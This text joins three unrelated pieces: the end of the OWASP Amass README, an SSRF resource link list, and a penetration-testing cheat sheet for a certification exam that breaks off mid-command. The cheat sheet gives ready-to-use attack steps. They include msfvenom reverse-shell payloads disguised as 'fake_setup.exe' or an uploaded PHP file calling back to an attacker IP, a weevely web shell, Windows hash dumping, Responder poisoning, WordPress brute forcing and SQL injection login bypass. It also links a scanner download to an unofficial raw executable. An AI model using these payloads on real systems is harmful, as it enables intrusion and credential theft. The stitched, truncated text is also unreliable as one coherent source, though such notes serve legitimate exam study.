Crtsh, Digitorus, FacebookCT | | DNS | Brute forcing, Reverse DNS sweeping, NSEC zone walking, Zone transfers, FQDN alterations/permutations, FQDN Similarity-based Guessing | | Routing | ASNLookup, BGPTools, BGPView, BigDataCloud, IPdata, IPinfo, RADb, Robtex, ShadowServer, TeamCymru | | Scraping | AbuseIPDB, Ask, Baidu, Bing, CSP Header, DNSDumpster, DNSHistory, DNSSpy, DuckDuckGo, Gists, Google, HackerOne, HyperStat, PKey, RapidDNS, Riddler, Searx, SiteDossier, Yahoo | | Web Archives | Arquivo, CommonCrawl, HAW, PublicWWW, UKWebArchive, Wayback | | WHOIS | AlienVault, AskDNS, DNSlytics, ONYPHE, SecurityTrails, SpyOnWeb, WhoisXMLAPI | ---- ## Installation [![Go Version](https://img.shields.io/github/go-mod/go-version/owasp-amass/amass)](https://golang.org/dl/) [![Docker Images](https://img.shields.io/docker/pulls/caffix/amass.svg)](https://hub.docker.com/r/caffix/amass) [![GitHub Downloads](https://img.shields.io/github/downloads/owasp-amass/amass/latest/total.svg)](https://github.com/owasp-amass/amass/releases/latest) > You can find some additional installation variations in the [Installation Guide](./doc/install.md). ### Prebuilt Packages 1. Simply unzip the [package](https://github.com/owasp-amass/amass/releases/latest) 2. Put the precompiled binary into your path 3. Start using OWASP Amass! #### Homebrew ```bash brew tap owasp-amass/amass brew install amass ``` ### Docker Container 1. Install [Docker](https://www.docker.com) 2. Pull the Docker image by running `docker pull caffix/amass` 3. Run `docker run -v OUTPUT_DIR_PATH:/.config/amass/ caffix/amass enum -d example.com` The volume argument allows the Amass graph database to persist between executions and output files to be accessed on the host system. The first field (left of the colon) of the volume option is the amass output directory that is external to Docker, while the second field is the path, internal to Docker, where amass will write the output files. ### From Source 1. Install [Go](https://golang.org/doc/install) and setup your Go workspace 2. Download OWASP Amass by running `go install -v github.com/owasp-amass/amass/v4/...@master` 3. At this point, the binary should be in `$GOPATH/bin` ## Documentation [![GoDoc](https://pkg.go.dev/badge/github.com/owasp-amass/amass/v4?utm_source=godoc)](https://pkg.go.dev/github.com/owasp-amass/amass/v4) Use the [Installation Guide](./doc/install.md) to get started. Go to the [User's Guide](./doc/user_guide.md) for additional information. See the [Tutorial](./doc/tutorial.md) for example usage. See the [Amass Scripting Engine Manual](./doc/scripting.md) for greater control over your enumeration process. ## Corporate Supporters [![ZeroFox Logo](./images/zerofox_logo.png)](https://www.zerofox.com/) [![IPinfo Logo](./images/ipinfo_logo.png)](https://ipinfo.io/) [![WhoisXML API Logo](./images/whoisxmlapi_logo.png)](https://www.whoisxmlapi.com/) ## Testimonials ### [![Accenture Logo](./images/accenture_logo.png) Accenture](https://www.accenture.com/) *"Accenture’s adversary simulation team has used Amass as our primary tool suite on a variety of external enumeration projects and attack surface assessments for clients. It’s been an absolutely invaluable basis for infrastructure enumeration, and we’re really grateful for all the hard work that’s gone into making and maintaining it – it’s made our job much easier!"* \- Max Deighton, Accenture Cyber Defense Manager ### [![Visma Logo](./images/visma_logo.png) Visma](https://www.visma.com/) *"For an internal red team, the organisational structure of Visma puts us against a unique challenge. Having sufficient, continuous visibility over our external attack surface is an integral part of being able to efficiently carry out our task. When dealing with hundreds of companies with different products and supporting infrastructure we need to always be on top of our game.* *For years, OWASP Amass has been a staple in the asset reconnaissance field, and keeps proving its worth time after time. The tool keeps constantly evolving and improving to adapt to the new trends in this area."* \- Joona Hoikkala ([@joohoi](https://github.com/joohoi)) & Alexis Fernández ([@six2dez](https://github.com/six2dez)), Visma Red Team ## References [![DEF CON 30 Recon Village](https://img.shields.io/badge/defcon%2030-recon%20village-lightgrey.svg)](https://twitter.com/jeff_foley/status/1562246069278445568/photo/1) [![DEF CON 28 Red Team Village](https://img.shields.io/badge/defcon%2028-red%20team%20village-red.svg)](https://www.youtube.com/c/RedTeamVillage/featured) [![DEF CON 27 Demo Labs](https://img.shields.io/badge/defcon%2027-demo%20labs-purple.svg)](https://www.defcon.org/html/defcon-27/dc-27-demolabs.html) Did you write a blog post, magazine article or do a podcast about OWASP Amass? Or maybe you held or joined a conference talk or meetup session, a hacking workshop or public training where this project was mentioned? Add it to our ever-growing list of [REFERENCES.md](REFERENCES.md) by forking and opening a Pull Request! ### Top Mentions * [Phillip Wylie | Securing APIs Through External Attack Surface Management (EASM)](https://www.uscybersecurity.net/csmag/securing-apis-through-external-attack-surface-management-easm/) * [Kento Stewart | Mapping Your External Perimeter during an Incident with OWASP Amass](https://www.youtube.com/watch?v=23tQ4zLA-9A) * [WhoisXML API | OWASP Amass and WhoisXML API Are Now Integration Partners](https://main.whoisxmlapi.com/success-stories/cyber-security-solutions/owasp-amass-and-whoisxml-api-are-now-integration-partners) * [Intigriti | Hacker tools: Amass – Hunting for Subdomains](https://blog.intigriti.com/2021/06/08/hacker-tools-amass-hunting-for-subdomains) * [Hakluke | Guide to Amass — How to Use Amass More Effectively for Bug Bounties](https://medium.com/@hakluke/haklukes-guide-to-amass-how-to-use-amass-more-effectively-for-bug-bounties-7c37570b83f7) * [SecurityTrails | OWASP Amass: A Solid Information Gathering Tool](https://securitytrails.com/blog/owasp-amass) * [TrustedSec | Upgrade Your Workflow, Part 1: Building OSINT Checklists](https://www.trustedsec.com/blog/upgrade-your-workflow-part-1-building-osint-checklists/) * [SANS ISC | Offensive Tools Are For Blue Teams Too](https://isc.sans.edu/forums/diary/Offensive+Tools+Are+For+Blue+Teams+Too/25842/) * [Jason Haddix | LevelUp 0x02 - The Bug Hunters Methodology v3(ish)](https://www.youtube.com/watch?v=Qw1nNPiH_Go) * [Daniel Miessler | amass — Automated Attack Surface Mapping](https://danielmiessler.com/study/amass/) * [Dionach | How to Use OWASP Amass: An Extensive Tutorial](https://www.dionach.com/blog/how-to-use-owasp-amass-an-extensive-tutorial/) * [nynan | How to **Actually** Use Amass More Effectively — Bug Bounty](https://medium.com/@nynan/how-to-actually-use-amass-more-effectively-bug-bounty-59e83900de02) * [ToolWar | Extreme Subdomain Enumeration/Scanning on Windows : OWASP Amass](https://www.youtube.com/watch?v=mEQnVkSG19M) ## Contributing [![Contribute Yes](https://img.shields.io/badge/contribute-yes-brightgreen.svg)](./CONTRIBUTING.md) [![Chat on Discord](https://img.shields.io/discord/433729817918308352.svg?logo=discord)](https://discord.gg/HNePVyX3cp) We are always happy to get new contributors on board! Please check [CONTRIBUTING.md](CONTRIBUTING.md) to learn how to contribute to our codebase, and join our [Discord Server](https://discord.gg/HNePVyX3cp) to discuss current project goals. ## Troubleshooting [![Chat on Discord](https://img.shields.io/discord/433729817918308352.svg?logo=discord)](https://discord.gg/HNePVyX3cp) If you need help with installation and/or usage of the tool, please join our [Discord server](https://discord.gg/HNePVyX3cp) where community members can best help you. :stop_sign: **Please avoid opening GitHub issues for support requests or questions!** ## Licensing [![License](https://img.shields.io/badge/license-apache%202-blue)](https://www.apache.org/licenses/LICENSE-2.0) This program is free software: you can redistribute it and/or modify it under the terms of the [Apache license](LICENSE). OWASP Amass and any contributions are Copyright © by Jeff Foley 2017-2023. Some subcomponents have separate licenses. ![Network graph](./images/network_06092018.png "Amass Network Mapping")
# AllThingsSSRF **This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location** This is currently work in progress I will add more resources as I find them. ![SSRF Logo](/images/ssrf.jpg) ### Created By [@jdonsec](https://twitter.com/jdonsec) --- #### Learn What is SSRF - [Vickie Li: Intro to SSRF](https://medium.com/swlh/intro-to-ssrf-beb35857771f) - [Vickie Li: Exploiting SSRFs](https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437) - [Detectfy - What is server side request forgery (SSRF)?](https://blog.detectify.com/2019/01/10/what-is-server-side-request-forgery-ssrf/) - [What is SSRF By Netsparker](https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/) - [Hackerone How To: Server-Side Request Forgery(SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) - [Nahamsec/Daeken - OWNING THE CLOUT THROUGH SSRF AND PDF GENERATORS](https://docs.google.com/presentation/d/1JdIjHHPsFSgLbaJcHmMkE904jmwPM4xdhEuwhy2ebvo/edit#slide=id.p) - [Orange Tsai A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf) connect - [Infosec Institute SSRF Introduction](https://resources.infosecinstitute.com/the-ssrf-vulnerability/) - [SSRF bible](https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/SSRFbible%20Cheatsheet.pdf) - [Book of Bugbounty Tips](https://gowsundar.gitbook.io/book-of-bugbounty-tips/ssrf) - [Cujanovic - SSRF Testing](https://github.com/cujanovic/SSRF-Testing) - [EdOverflow - Bugbounty-Cheatsheet](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md) - [@ONsec_lab SSRF pwns: New techniques and stories](https://conference.hitb.org/hitbsecconf2013ams/materials/D1T1%20-%20Vladimir%20Vorontsov%20and%20Alexander%20Golovko%20-%20SSRF%20PWNs%20-%20New%20Techniques%20and%20Stories.pdf) - [Swissky - Payload All The Things SSRF](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) - [HAHWUL](https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html) - [Acunetix - What is Server Side Request Forgery(SSRF)?](https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/) - [xI17dev - SSRF Tips](https://blog.safebuff.com/2016/07/03/SSRF-Tips/) - [SaN ThosH SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) - [SaN ThosH SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-2](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0) - [AUXY Blog - SSRF in Depth](http://www.auxy.xyz/research/2017/07/06/all-ssrf-knowledge.html) - [CTF Wiki - SSRF Introduction](https://ctf-wiki.github.io/ctf-wiki/web/ssrf/) - [Orangetw - CTF SSRF Writeup](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/README.md#ssrfme) #### Writeups - [@leonmugen: SSRF Reading Local Files from DownNotifier server](https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/) - [Fireshell Security Team: SunshineCTF - Search Box Writeup](https://fireshellsecurity.team/sunshinectf-search-box/) - [SSRF vulnerability via FFmpeg HLS processing](https://medium.com/@valeriyshevchenko/ssrf-vulnerability-via-ffmpeg-hls-processing-f3823c16f3c7) - [Escalating SSRF to RCE](https://medium.com/cesppa/escalating-ssrf-to-rce-f28c482eb8b9) - [Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!](https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326) - [Chris Young: SSRF - Server Side Request Forgery](https://chris-young.net/2018/04/13/ssrf-server-side-request-forgery/) - [Day Labs: SSRF attack using Microsoft's bing webmaster central](https://blog.0daylabs.com/2015/08/09/SSRF-in-Microsoft-bing/) - [Elber Andre: SSRF Tips SSRF/XSPA in Microsoft’s Bing Webmaster Central](https://medium.com/@elberandre/ssrf-trick-ssrf-xspa-in-microsofts-bing-webmaster-central-8015b5d487fb) - [Valeriy Shevchenko: SSRF Vulnerability due to Sentry misconfiguration](https://medium.com/@valeriyshevchenko/ssrf-vulnerability-due-to-sentry-misconfiguration-5e758bdb4e44) - [Vickie Li: Bypassing SSRF Protection](https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b) - [Vickie Li: SSRF in the Wild](https://medium.com/swlh/ssrf-in-the-wild-e2c598900434) - [Tug Pun: From SSRF to Local File Disclosure](https://medium.com/@tungpun/from-ssrf-to-local-file-disclosure-58962cdc589f) - [Neeraj Sonaniya: Reading Internal Files using SSRF vulnerability](https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb) - [Pratik yadav: Ssrf to Read Local Files and Abusing the AWS metadata](https://medium.com/@pratiky054/ssrf-to-read-local-files-and-abusing-the-aws-metadata-8621a4bf382) - [Shorebreak Security: SSRF’s up! Real World Server-Side Request Forgery (SSRF)](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) - [Hack-Ed: A Nifty SSRF Bug Bounty Write Up](https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/) - [abcdsh Asis 2019 Quals - Baby SSRF](https://abcdsh.blogspot.com/2019/04/writeup-asis-2019-quals-baby-ssrf.html) - [W00troot: How I found SSRF on TheFacebook.com](https://w00troot.blogspot.com/2017/12/how-i-found-ssrf-on-thefacebookcom.html) - [Deepak Holani: Server Side Request Forgery(SSRF){port issue hidden approch }](https://medium.com/@w_hat_boy/server-side-request-forgery-ssrf-port-issue-hidden-approch-f4e67bd8cc86) - [Brett Buerhaus: SSRF Writeups](https://buer.haus/tag/ssrf/) - [GeneralEG: Escalating SSRF to RCE](https://generaleg0x01.com/2019/03/10/escalating-ssrf-to-rce/) - [Coen Goedegebure: How I got access to local AWS info via Jira](https://www.coengoedegebure.com/how-i-got-access-to-local-aws-info-via-jira/) - [Corben Leo: Hacking the Hackers: Leveraging an SSRF in HackerTarget](https://www.corben.io/hackertarget/) - [Orange Tsai: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) - [Peter Adkins: Pivoting from blind SSRF to RCE with HashiCorp Consul](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html) - [pwntester: hackyou2014 Web400 write-up](http://www.pwntester.com/tag/ssrf/) - [Azure Assassin Alliance SSRF Me](https://ctftime.org/writeup/16067) - [003Random’s Blog: H1-212 CTF ~ Write-Up](https://poc-server.com/blog/2017/11/20/h1-212-ctf-write-up/) - [Bubounty POC SSRF Bypass in private website](https://bugbountypoc.com/ssrf-bypass-in-private-website/) - [Peerlyst: Top SSRF Posts](https://www.peerlyst.com/tags/ssrf) - [Elber "f0lds" Tavares: $1.000 SSRF in Slack](https://fireshellsecurity.team/1000-ssrf-in-slack/) - [Kongweinbin: Write-up for Gemini Inc: 1](https://kongwenbin.com/write-up-for-gemini-inc-1/#more-1548) - [LiveOverFlow: SSRF targeting redis for RCE via IPv6/IPv4 address embedding chained with CLRF injection in the git:// protocol.](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) - [GitLab SSRF in project integrations (webhook)](https://gitlab.com/gitlab-org/gitlab-ce/issues/53242) - [Maxime Leblanc: Server-Side Request Forgery (SSRF) Attacks - Part 1: The basics](https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-1-the-basics-a42ba5cc244a) - [Maxime Leblanc: Server-Side Request Forgery (SSRF) Attacks — Part 2: Fun with IPv4 addresses](https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-2-fun-with-ipv4-addresses-eb51971e476d) - [Maxime Leblanc: Server-Side Request Forgery (SSRF) — Part 3: Other advanced techniques](https://medium.com/poka-techblog/server-side-request-forgery-ssrf-part-3-other-advanced-techniques-3f48cbcad27e) - [Maxime Leblanc: Privilege escalation in the Cloud: From SSRF to Global Account Administrator](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) - [Asterisk Labs: Server-side request forgery in Sage MicrOpay ESP](https://labs.asteriskinfosec.com.au/tag/ssrf/) - [EdOverflow: Operation FGTNY 🗽 - Solving the H1-212 CTF](https://edoverflow.com/2017/h1-212-ctf/) - [Alyssa Herrera: Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) - [Alyssa Herrera: Wappalyzer SSRF Write up](https://medium.com/@alyssa.o.herrera/wappalyzer-ssrf-write-up-2dab4df064ae) - [Contribution by $root: Whomai - Harsh Jaiswal: Vimeo SSRF with code execution potential.](https://medium.com/@rootxharsh_90844/vimeo-ssrf-with-code-execution-potential-68c774ba7c1e) - [Agarri: Server-side browsing considered harmful](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) #### Hackerone Reports - [#223203 SVG Server Side Request Forgery (SSRF)](https://hackerone.com/reports/223203) - [115857 SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857) - [237381 SSRF and local file disclosure in https://wordpress.com/media/videos/ via FFmpeg HLS processing](https://hackerone.com/reports/237381) - [228377 SSRF in upload IMG through URL](https://hackerone.com/reports/228377) - [302885 ImageMagick GIF coder vulnerability leading to memory disclosure](https://hackerone.com/reports/302885) - [392859 Sending Emails from DNSDumpster - Server-Side Request Forgery to Internal SMTP Access](https://hackerone.com/reports/392859) - [395521 SSRF vulnerability on proxy.duckduckgo.com (access to metadata server on AWS)](https://hackerone.com/reports/395521) - [285380 www.threatcrowd.org - SSRF : AWS private key disclosure](https://hackerone.com/reports/285380) - [287762 SSRF protection bypass](https://hackerone.com/reports/287762) - [115748 SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748) - [508459 SSRF in webhooks leads to AWS private keys disclosure](https://hackerone.com/reports/508459) - [643622 SSRF In Get Video Contents](https://hackerone.com/reports/643622) - [398641 D0nut: SSRF on duckduckgo.com/iu/](https://hackerone.com/reports/398641https://hackerone.com/reports/398641) - [398799 Jobert Abma (jobert): Unauthenticated blind SSRF in OAuth Jira authorization controller](https://hackerone.com/reports/398799) - [369451 Dylan Katz (plazmaz): SSRF in CI after first run](https://hackerone.com/reports/369451) - [341876 André Baptista (0xacb): SSRF in Exchange leads to ROOT access in all instances](https://hackerone.com/reports/341876) - [374737 ruvlol (ruvlol): Blind SSRF on errors.hackerone.net due to Sentry misconfiguration](https://hackerone.com/reports/374737) - [386292 Elb (elber): Bypass of the SSRF protection in Event Subscriptions parameter](https://hackerone.com/reports/386292) - [411865 Robinooklay: Blind SSRF at https://chaturbate.com/notifications/update_push/](https://hackerone.com/reports/411865) - [517461 Ninja: Blind SSRF/XSPA on dashboard.lob.com + blind code injection](https://hackerone.com/reports/517461) - [410882 Steven Seeley: Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical)](https://hackerone.com/reports/410882) - [395521 Predrag Cujanović: SSRF vulnerability on proxy.duckduckgo.com (access to metadata server on AWS)](https://hackerone.com/reports/395521) - [223203 floyd: SVG Server Side Request Forgery (SSRF)](https://hackerone.com/reports/223203) - [301924 jax: SSRF vulnerability in gitlab.com webhook](https://hackerone.com/reports/301924) - [204513 Skansing: Infrastructure - Photon - SSRF](https://hackerone.com/reports/204513) - [115748 Eugene Farfel: SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748) - [263169 Tung Pun: New Relic - Internal Ports Scanning via Blind SSRF](https://hackerone.com/reports/263169) - [280511 Suresh Narvaneni: Server Side Request Forgery on JSON Feed](https://hackerone.com/reports/280511) - [281950 Tung Pun: Infogram - Internal Ports Scanning via Blind SSRF](https://hackerone.com/reports/281950) - [289187 Predrag Cujanović: DNS pinning SSRF](https://hackerone.com/reports/289187) - [288183 Dr.Jones: SSRF bypass for https://hackerone.com/reports/285380 (query AWS instance)](https://hackerone.com/reports/288183) - [288537 e3xpl0it: Server Side Request Forgery protection bypass № 2](https://hackerone.com/reports/288537) - [141304 ylujion: Blind SSRF on synthetics.newrelic.com](https://hackerone.com/reports/141304) - [128685 Nicolas Grégoire: SSRF on testing endpoint](https://hackerone.com/reports/128685) - [145524 paglababa: Server side request forgery (SSRF) on nextcloud implementation.](https://hackerone.com/reports/145524) - [115857 Slim Shady: SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857) #### Videos/POC - [Black Hat: Viral Video - Exploiting SSRF in Video Converters](https://www.youtube.com/watch?v=tZil9j7TTps&feature=youtu.be) - [Hackerone: Hacker101 - SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8) - [Bugcrowd University: Server Side Request Forgery](https://www.bugcrowd.com/resources/webinars/server-side-request-forgery/) - [Muhammad Junaid: Yahoo SSRF and Local File Disclosure via FFmpeg](https://www.youtube.com/watch?v=3Z_f69OIQuw) - [Muhammad Junaid: Flickr (Yahoo!) SSRF and Local File Disclosure](https://www.youtube.com/watch?v=v3YQqTb5geU) - [Corben Leo: SMTP Access via SSRF in HackerTarget API](https://www.youtube.com/watch?v=F_sC_OrSkIc) - [Nikhil Mittal: HootSuite SSRF Vulnerability POC](https://www.youtube.com/watch?v=L9bGSNmlJXU) - [Hack In The Box Security Conference: HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk) - [Crazy Danish Hacker: Server-Side Request Forgery (SSRF) - Web Application Security Series #1](https://www.youtube.com/watch?v=K_ElxRc9LLk) - [LiveOverFlow: PHP include and bypass SSRF protection with two DNS A records - 33c3ctf list0r (web 400)](https://www.youtube.com/watch?v=PKbxK2JH23Y) - [Nahamsec: Owning the Clout through SSRF & PDF Generators - Defcon 27 - (SSRF on ads.snapchat.com)](https://www.youtube.com/watch?v=Gcab8sLBmnk) - [Tutorials Point (India) Pvt. Ltd: Penetration Testing - Server Side Request Forgery (SSRF)](https://www.youtube.com/watch?v=_IVjvNelzMw) - [Hack In The Box Security Conference: HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk) - [AppSec EU15 - Nicolas Gregoire - Server-Side Browsing Considered Harmful](https://www.youtube.com/watch?v=8t5-A4ASTIU) #### Tools - [Bcoles - SSRF Proxy](https://bcoles.github.io/ssrf_proxy/) - [Daeken - SSRFTest](https://github.com/daeken/SSRFTest) - [Daeken - httptrebind](https://github.com/daeken/httprebind) #### CTF/Labs - [Bugbounty Notes SSRF Challenge](https://www.bugbountynotes.com/challenge?id=33) - [Portswigger SSRF labs](https://portswigger.net/web-security/ssrf) - [m6a-UdS SSRF Lab](https://github.com/m6a-UdS/ssrf-lab) - [Pentester Lab Pro account: Essential: Server Side Request Forgery 01](https://pentesterlab.com/exercises/ssrf_01/course) - [Pentester Lab Pro account: Essential: Server Side Request Forgery 02](https://pentesterlab.com/exercises/ssrf_02/course) - [Pentester Lab Pro account: Essential: Server Side Request Forgery 03](https://pentesterlab.com/exercises/ssrf_03/course) - [Pentester Lab Pro account: Essential: Server Side Request Forgery 04](https://pentesterlab.com/exercises/ssrf_04/course) - [Se8S0n SSRF Lab Guide](https://se8s0n.github.io/2019/05/19/SSRF-LABS%E6%8C%87%E5%8D%97/) - [SSRF by Donat <3](https://medium.com/@d0nut/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5) -[ssrf MAP](https://github.com/swisskyrepo/SSRFmap) -[Smuggling HTTP headers through reverse proxies](https://telekomsecurity.github.io/2020/05/smuggling-http-headers-through-reverse-proxies.html)
<img src="CEH-PRACTICAL-9-7-2022 (1).png" /> # Reconnasiance/Footprinting <details> <summary>Recon</summary> * -r range , Scan Entire Network for ALive host using ARP ```console :~$ netdiscover -r 192.168.29.1/24 ``` * -f switch do not fragment, -l buffer size ```console :~$ ping <host-ip> -f -l 1300 ``` * __`tracert`__ for windows cmd ```console :~$ traceroute <host-ip> ``` * [Path Analyzer Pro](https://www.pathanalyzer.com/download.opp/) in traceroute tools, ensure icmp and smart is selected, stop on control is selected * Start Metasploit Console ```console :~# msfdb init && msfconsole :~# msfdb status ``` * Nmap Scanning entire Network ```console # Don’t ping=> -Pn, SYN scan=> -sS, Aggresive Scan=> -A, Normal_XML and Grepable format all at once=> -oA, Verbose=> -vv nmap -Pn -sS -A -oA <Filename> 10.10.1.1/24 -vv ``` * Convert Nmap XML file to [HTML Report](https://nmap.org/book/output-formats-output-to-html/) ```console xsltproc <nmap-output.xml> -o <nmap-output.html> ``` ```console # Scanning SMB Version for OS Detection using Metaspolit use scanner/smb/smb_version show options set RHOSTS 10.10.10.8-16 set THREADS 100 run #Type hosts again and os_flavor will be visible hosts ``` </details> # Scanning Network <details> <summary>Scan Network</summary> * [Angry IP Scanner](https://angryip.org/download/#windows) of windows to Scan Entire Network * [Advanced IP Scanner](https://github.com/infovault-Ytube/test1/raw/main/ipscan25.exe) free network scanner to analyze LAN <img src="AdvancedIPScanner.jpg" /> </details> # ENUMERATION <details> <summary>Enum</summary> * [Hyena](https://www.systemtools.com/hyena/download.htm) Expand local workstation to view Users, Services, User Rights, Scheduled Jobs * [NetBIOS Enumerator](http://nbtenum.sourceforge.net/) Enter IP Range and click scan. * NBT (NetBIOS over TCP/IP), which helps troubleshoot NetBIOS name resolution issues. ```console nbtstat -A 204.224.150.3 ``` * Accessing Shared Files ```console. # List All Shared Resources net view <IP> # Connect to Shared Resource net use net use \\10.10.10.1\e ""\user:"" net use \\10.10.10.1\e ""/user:"" ``` * SNMP Enumeration ```shell nmap -sU -p 161 10.10.1.2 nmap -sU -p 161 --script=snmp-brute 10.10.1.2 # Expoilt SNMP with Metasploit msfdb init && msfconsole ↵ use auxilary/scanner/snmp/snmp_login ↵ set RHOSTS 10.10.1.2 ↵ exploit ↵ use auxilary/scanner/snmp/snmp_enum ↵ set RHOSTS 10.10.1.2 ↵ exploit ↵ ``` * Enum4linux: Enumerating information from Windows and Samba systems ```console enum4linux -A <Target_IP> ``` </details> # Vulnerability Analysis <details> <summary>Vulerability</summary> * Nessus: Assest vulnerability scanner * Nikto: Web Server scanner ```console nikto -h www.example.com tuning 1 ``` </details> # System Hacking <details> <summary> Sys password Hacking</summary> ``` # To Dump Windows SAM file hashes pwDump7.exe> hashes.txt ``` > pwDump7.exe : To Dump Windows Hashes [PwDump7](https://www.tarasco.org/security/pwdump_7/pwdump7.zip) * [Ophcrack.exe](https://ophcrack.sourceforge.io/download.php?type=ophcrack) : To Crack SAM Hashes to obtain clear Password * [rcrack_gui.exe](http://project-rainbowcrack.com/) : Use Raindow Table to crack hashes </details> <details> <summary> Create A Reverse TCP Connection</summary> ```shell # creates reverse TCP from windows machine, send this file to victim machine via python-Webserver/shared resource msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=<attacker_IP> LPORT=444 -o fake_setup.exe ↵ msfdb init && msfconsole ↵ use exploit/multi/handler ↵ set LHOST=<attacker-IP> ↵ set LPORT=444 ↵ run ``` </details> # Steganography <details> <summary> Stego</summary> #### Hide/unhide text in WhiteSpaces using [snow](http://www.darkside.com.au/snow/) ```shell SNOW.EXE -C -p 1234 -m "Secret Message" original.txt ciper.txt # To unhide the hidden text SNOW.EXE -C -p 1234 ciper.txt ``` ### [OpenStego](https://github.com/syvaidya/openstego/releases) : Hide any data within a cover file like Images <img src="https://www.openstego.com/image/screenshot/01.png" width="600" height="400" /> <img src="https://www.openstego.com/image/screenshot/02.png" width="600" height="400" /> ### [QuickStego](http://cybernescence.co.uk/software-products/QS12Setup.exe): Hide text in pictures without password <img src="http://quickcrypto.com/content-images/QuickStego_12_Steganography_Software_Ex_sml.jpg" width="600" height="400" /> </details> # LLMNR/NBT-NS Poisoning <details> <summary> LLMNR/NBT</summary> > [Responder](https://github.com/lgandx/Responder) : rogue authentication server to capture hashes > >> This can be used to get the already logged-in user's password, who is trying to access a shared resource which is not present [Step by Step](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/) ```shell # In Parrot/Kali OS, responder -I eth0 ↵ # In windows, try to access the shared resource, logs are stored at usr/share/responder/logs/SMB<filename> # To crack that hash, use JohntheRipper john SMB<filename> ↵ ``` </details> # Website Hacking/Password Cracking <details> <summary>Website Cracking</summary> * SkipFish : Active Recon for Websites ```console skipfish -o 202 http://192.168.1.202/wordpress ``` * Wordpress Site Login BruteForce [Step-By-Step](https://www.hackingarticles.in/multiple-ways-to-crack-wordpress-login/) ```shell # Wordpress site only Users Enumeration wpscan --url http://example.com/ceh --enumerate u # Direct crack if we have user/password details wpscan --url http://192.168.1.100/wordpress/ -U users.txt -P /usr/share/wordlists/rockyou.txt # Using Metaspoilt msfdb init && msfconsole msf > use auxiliary/scanner/http/wordpress_login_enum msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.100 msf auxiliary(wordpress_login_enum) > set targeturi /wordpress msf auxiliary(wordpress_login_enum) > set user_file user.txt msf auxiliary(wordpress_login_enum) > set pass_file pass.txt msf auxiliary(wordpress_login_enum) > exploit ``` ### File Upload Vulnerability ```shell msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f raw > file.php msfdb init && msfconsole use multi/handler set payload php/meterepreter/reverse_tcp set LHOST=attacker-ip set LPORT= attcker-port run # If incase, metaspolit not working use NetCat and shell code below ``` > [Reverse Shell Cheat Sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) : Use the code, change IP & Port and use it with NetCat listener ```console nc -vnl -p 1234 ``` > [Weevely](https://www.kali.org/tools/weevely/) : Generate PHP Reverse shell ```shell weevely generate password123 /home/error.php # Upload the above error.php to website and use the below cmd to get reverse shell weevely http://domain.com/error.php password123 ``` ### SQL Injection > Login bypass with [' or 1=1 --](https://github.com/mrsuman2002/SQL-Injection-Authentication-Bypass-Cheat-Sheet/blob/master/SQL%20Injection%20Cheat%20Sheet.txt) > [N-Stalker](https://www.nstalker.com/) : Select OWASP Policy => Scan Website for Vulnerabilites > SQLMAP ```shell #List databases, add cookie values sqlmap -u "http://domain.com/path.aspx?id=1" 